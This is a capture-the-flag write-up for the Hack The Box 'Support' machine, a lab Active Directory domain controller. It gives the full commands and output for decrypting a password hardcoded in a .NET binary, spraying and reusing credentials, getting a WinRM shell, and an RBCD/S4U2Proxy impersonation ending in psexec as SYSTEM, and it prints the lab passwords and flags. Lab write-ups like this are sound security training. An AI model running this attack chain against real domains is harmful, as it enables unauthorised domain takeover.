Overview

The machine starts by SMB guest access that exposes a support-tools share containing a suspicious .NET binary, decompiling it reveals hardcoded XOR-encrypted LDAP credentials which we decrypt to authenticate as the ldap user, raw LDAP enumeration finds a plaintext password in the info field of the support user giving us winrm access, bloodhound then shows support is a member of Shared Support Accounts which holds GenericAll over the DC so we create a machine account and abuse RBCD via S4U2Proxy to impersonate Administrator and get shell as SYSTEM

Enumeration

start with nmap scan

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.230.181 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-15 12:07 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:07
Completed Parallel DNS resolution of 1 host. at 12:07, 0.17s elapsed
Initiating Connect Scan at 12:07
Scanning 10.129.230.181 [1000 ports]
Discovered open port 53/tcp on 10.129.230.181
Discovered open port 445/tcp on 10.129.230.181
Discovered open port 139/tcp on 10.129.230.181
Discovered open port 135/tcp on 10.129.230.181
Discovered open port 3269/tcp on 10.129.230.181
Discovered open port 3268/tcp on 10.129.230.181
Discovered open port 636/tcp on 10.129.230.181
Discovered open port 464/tcp on 10.129.230.181
Discovered open port 389/tcp on 10.129.230.181
Discovered open port 593/tcp on 10.129.230.181
Discovered open port 88/tcp on 10.129.230.181
Completed Connect Scan at 12:08, 41.91s elapsed (1000 total ports)
Initiating Service scan at 12:08
Scanning 11 services on 10.129.230.181
Completed Service scan at 12:09, 25.76s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.230.181.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:09
NSE Timing: About 99.93% done; ETC: 12:09 (0:00:00 remaining)
Completed NSE at 12:09, 40.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 5.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
Nmap scan report for 10.129.230.181
Host is up, received user-set (0.33s latency).
Scanned at 2026-06-15 12:07:55 PDT for 113s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-06-15 19:08:45Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 17243/tcp): CLEAN (Timeout)
| Check 2 (port 29689/tcp): CLEAN (Timeout)
| Check 3 (port 26300/udp): CLEAN (Timeout)
| Check 4 (port 47439/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| _clock-skew: 0s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| smb2-time:
| date: 2026-06-15T19:09:06
| _ start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.83 seconds

got DNS, Kerberos, RPC, LDAP, KPASSWD, SMB and other active directory ports so we are sure it is an AD the domain name is support.htb and the host is DC so the FQDN is DC.support.htb there is no clock skew so lets fix the hosts file and start enumeration

hosts file

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ echo '10.129.230.181 DC DC.support.htb support.htb' | sudo tee -a /etc/hosts
10.129.230.181 DC DC.support.htb support.htb

we got Guest account enabled and we have access to a non-standard share called support-tools

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ nxc smb support.htb -u 'Guest' -p '' --shares
SMB 10.129.230.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.230.181 445 DC [+] support.htb\Guest:
SMB 10.129.230.181 445 DC [*] Enumerated shares
SMB 10.129.230.181 445 DC Share Permissions Remark
SMB 10.129.230.181 445 DC ----- ----------- ------
SMB 10.129.230.181 445 DC ADMIN$ Remote Admin
SMB 10.129.230.181 445 DC C$ Default share
SMB 10.129.230.181 445 DC IPC$ READ Remote IPC
SMB 10.129.230.181 445 DC NETLOGON Logon server share
SMB 10.129.230.181 445 DC support-tools READ support staff tools
SMB 10.129.230.181 445 DC SYSVOL Logon server share

Listing what's on that share returns all valid executables like 7z, putty for remote connections, npp (notepad ++), Sysinternals, windirstat, and wireshark But this UserInfo.exe looks odd so lets download it

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ smbclient //support.htb/support-tools -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 10:01:06 2022
  ..                                  D        0  Sat May 28 04:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 04:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 04:19:55 2022
  putty.exe                           A  1273576  Sat May 28 04:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 04:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 10:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 04:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 04:19:43 2022

file contains multiple dll files and the corresponding exe file so lets decompile it

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ unzip -l UserInfo.exe.zip
Archive: UserInfo.exe.zip
  Length Date Time Name
--------- ---------- ----- ----
    12288  2022-05-27 10:51   UserInfo.exe
    99840  2022-03-01 10:18   CommandLineParser.dll
    22144  2021-10-22 16:42   Microsoft.Bcl.AsyncInterfaces.dll
    47216  2021-10-22 16:48   Microsoft.Extensions.DependencyInjection.Abstractions.dll
    84608  2021-10-22 16:48   Microsoft.Extensions.DependencyInjection.dll
    64112  2021-10-22 16:51   Microsoft.Extensions.Logging.Abstractions.dll
    20856  2020-02-19 02:05   System.Buffers.dll
   141184  2020-02-19 02:05   System.Memory.dll
   115856  2018-05-15 06:29   System.Numerics.Vectors.dll
    18024  2021-10-22 16:40   System.Runtime.CompilerServices.Unsafe.dll
    25984  2020-02-19 02:05   System.Threading.Tasks.Extensions.dll
      563  2022-05-27 09:59   UserInfo.exe.config
--------- -------
   652675                     12 files

I like dotpeek the most ngl but it isn't worth to spin windows instance just for an easy box, I will just use ILSpy

decompiling the code shows this LdapQuery function so there must be some creds here to authenticate for this query

this one shows that the user used for this LDAP query called ldap and it calls this Protected.getPassword for the password

public LdapQuery()
{
    //IL_0018: Unknown result type (might be due to invalid IL or missing references)
    //IL_0022: Expected O, but got Unknown
    //IL_0035: Unknown result type (might be due to invalid IL or missing references)
    //IL_003f: Expected O, but got Unknown
    string password = Protected.getPassword();
    entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
    entry.set_AuthenticationType((AuthenticationTypes)1);
    ds = new DirectorySearcher(entry);
}

here is the getPassowrd which does some Decoding for the password variable enc_password

public static string getPassword()
{
    byte[] array = Convert.FromBase64String(enc_password);
    byte[] array2 = array;
    for (int i = 0; i < array.Length; i++)
    {
        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
    }
    return Encoding.Default.GetString(array2);
}

and here is the enc password and the key used for the decryption

using System.Text;

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");

so lets decrypt it using the same algorithm in the getPassword function but using python instead

here is my code for the decryption, nothing special it is the same as the one in C# the cp1525 decoder is just mapping to ASCII characters from 0 to 255 which is the byte array we have

python

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"

key = b"armando"

array = bytearray(base64.b64decode(enc_password))

for i in range(len(array)):
    array[i] = (array[i] ^ key[i % len(key)]) ^ 0xDF


decrypted_password = array.decode("cp1252")

print(f"Decrypted password: {decrypted_password}")

running the script gets us this password

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ python3 decrypt.py
Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

LDAP user

as you can see it is a valid authentication

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP 10.129.230.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.230.181 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

first got a list of users cause we'll need it

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --users-export users.txt
LDAP 10.129.230.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.230.181 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP 10.129.230.181 389 DC [*] Enumerated 20 domain users: support.htb
LDAP 10.129.230.181 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.230.181 389 DC Administrator 2022-07-19 10:55:56 0 Built-in account for administering the computer/domain
LDAP 10.129.230.181 389 DC Guest 2022-05-28 04:18:55 0 Built-in account for guest access to the computer/domain
LDAP 10.129.230.181 389 DC krbtgt 2022-05-28 04:03:43 0 Key Distribution Center Service Account
LDAP 10.129.230.181 389 DC ldap 2022-05-28 04:11:46 0
LDAP 10.129.230.181 389 DC support 2022-05-28 04:12:00 0
LDAP 10.129.230.181 389 DC smith.rosario 2022-05-28 04:12:19 0
LDAP 10.129.230.181 389 DC hernandez.stanley 2022-05-28 04:12:34 0
LDAP 10.129.230.181 389 DC wilson.shelby 2022-05-28 04:12:50 0
LDAP 10.129.230.181 389 DC anderson.damian 2022-05-28 04:13:05 0
LDAP 10.129.230.181 389 DC thomas.raphael 2022-05-28 04:13:21 0
LDAP 10.129.230.181 389 DC levine.leopoldo 2022-05-28 04:13:37 0
LDAP 10.129.230.181 389 DC raven.clifton 2022-05-28 04:13:53 0
LDAP 10.129.230.181 389 DC bardot.mary 2022-05-28 04:14:08 0
LDAP 10.129.230.181 389 DC cromwell.gerard 2022-05-28 04:14:24 0
LDAP 10.129.230.181 389 DC monroe.david 2022-05-28 04:14:39 0
LDAP 10.129.230.181 389 DC west.laura 2022-05-28 04:14:55 0
LDAP 10.129.230.181 389 DC langley.lucy 2022-05-28 04:15:10 0
LDAP 10.129.230.181 389 DC daughtler.mabel 2022-05-28 04:15:26 0
LDAP 10.129.230.181 389 DC stoll.rachelle 2022-05-28 04:15:42 0
LDAP 10.129.230.181 389 DC ford.victoria 2022-05-28 04:15:58 0
LDAP 10.129.230.181 389 DC [*] Writing 20 local users to users.txt

I used that list for 3 things, first was password spraying cause i though whoever created this ldap account might've reused his own password then i tried kerberoasting and asreproasting but nothing worked so i went back to raw ldap queries for these ldap users we might find password in any fields for these users

when i say raw queries, of course i mean my ldaphunt

running my script, we got a possible password for the user support so lets see if we can access anything with it

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ python3 ldaphunt.py -H 10.129.230.181 -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

██╗     ██████╗  █████╗ ██████╗ ██╗  ██╗██╗   ██╗███╗   ██╗████████╗
██║     ██╔══██╗██╔══██╗██╔══██╗██║  ██║██║   ██║████╗  ██║╚══██╔══╝
██║     ██║  ██║███████║██████╔╝███████║██║   ██║██╔██╗ ██║   ██║
██║     ██║  ██║██╔══██║██╔═══╝ ██╔══██║██║   ██║██║╚██╗██║   ██║
███████╗██████╔╝██║  ██║██║     ██║  ██║╚██████╔╝██║ ╚████║   ██║
╚══════╝╚═════╝ ╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝
                AD Credential Hunter | @jimmex

[*] Connecting to 10.129.230.181 as support.htb\ldap...
[+] Bound successfully!

[*] Enumerating users in DC=support,DC=htb...
[*] Found 21 user objects
[*] Scanning ALL attributes for credential patterns...

----------------------------------------------------------------------
[+] Administrator
    description [info:always-show]
        → Built-in account for administering the computer/domain

[+] Guest
    description [info:always-show]
        → Built-in account for guest access to the computer/domain

[+] DC$
    servicePrincipalName [possible:complex-string]
        → Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb
    servicePrincipalName [possible:complex-string]
        → E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb

[+] krbtgt
    description [info:always-show]
        → Key Distribution Center Service Account

[+] support
    info [info:always-show]
        → Ironside47pleasure40Watchful

----------------------------------------------------------------------

[*] Done. 5 users with potential credential data out of 21 total.

Shell as Support

and as you can see this user can winrm to the box

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc winrm support.htb -u support -p 'Ironside47pleasure40Watchful'
WINRM 10.129.230.181 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.129.230.181 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

and we got the user

bash

─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ evil-winrm -i support.htb -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> type ../desktop/user.txt
b06ace37b388bb3ade6c5dba17050eb0

collect data for bloodhound

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ rusthound -i 10.129.230.181 -u support -p 'Ironside47pleasure40Watchful' -z -d support.htb
---------------------------------------------------
Initializing RustHound at 13:16:25 on 06/15/26
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2026-06-15T20:16:25Z INFO  rusthound] Verbosity level: Info
[2026-06-15T20:16:25Z INFO  rusthound::ldap] Connected to SUPPORT.HTB Active Directory!
[2026-06-15T20:16:25Z INFO  rusthound::ldap] Starting data collection...
[2026-06-15T20:16:26Z INFO  rusthound::ldap] All data collected for NamingContext DC=support,DC=htb
[2026-06-15T20:16:26Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-15T20:16:26Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2026-06-15T20:16:27Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-15T20:16:27Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2026-06-15T20:16:27Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 21 users parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 61 groups parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 1 computers parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 1 ous parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 1 domains parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 2 gpos parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] 21 containers parsed!
[2026-06-15T20:16:27Z INFO  rusthound::json::maker] .//20260615131627_support-htb_rusthound.zip created!

RustHound Enumeration Completed at 13:16:27 on 06/15/26! Happy Graphing!

looking at the bloodhound data, the user support is a member of Shared Support Accounts group which has generic all over the DC machine which we can abuse with RBCD abusing the allowedToAct edge Pasted image 20260615233924.png

Shell as SYSTEM

first add a computer account to the domain

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ addcomputer.py -method SAMR -computer-name attack$ -computer-pass 'Password123!' -dc-host 10.129.230.181 -domain-netbios support.htb 'support.htb/support:Ironside47pleasure40Watch
ful'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account attack$ with password Password123!.

then add the RBCD over the attack

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ rbcd.py -delegate-from attack$ -delegate-to DC$ -action write support.htb/support:Ironside47pleasure40Watchful
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attack$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attack$      (S-1-5-21-1677581083-3380853377-188903654-6101)

then ask for a ticket impersonating the administrator

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ getST.py -spn cifs/DC.support.htb -impersonate administrator support.htb/attack$:'Password123!'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache

now export the ticket

plaintext

─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ export KRB5CCNAME=administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache

then read the root flag

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ psexec.py -k -no-pass dc.support.htb
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RunuXIhQ.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service cZWd on dc.support.htb.....
[*] Starting service cZWd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> type \Users\Administrator\Desktop\root.txt
6c28f9b91c790f72f6b3322a251b5b41

C:\Windows\system32>

HTB: Support

Overview

Enumeration

LDAP user

Shell as Support

Shell as SYSTEM

Resources

Share

Subscribe to the newsletter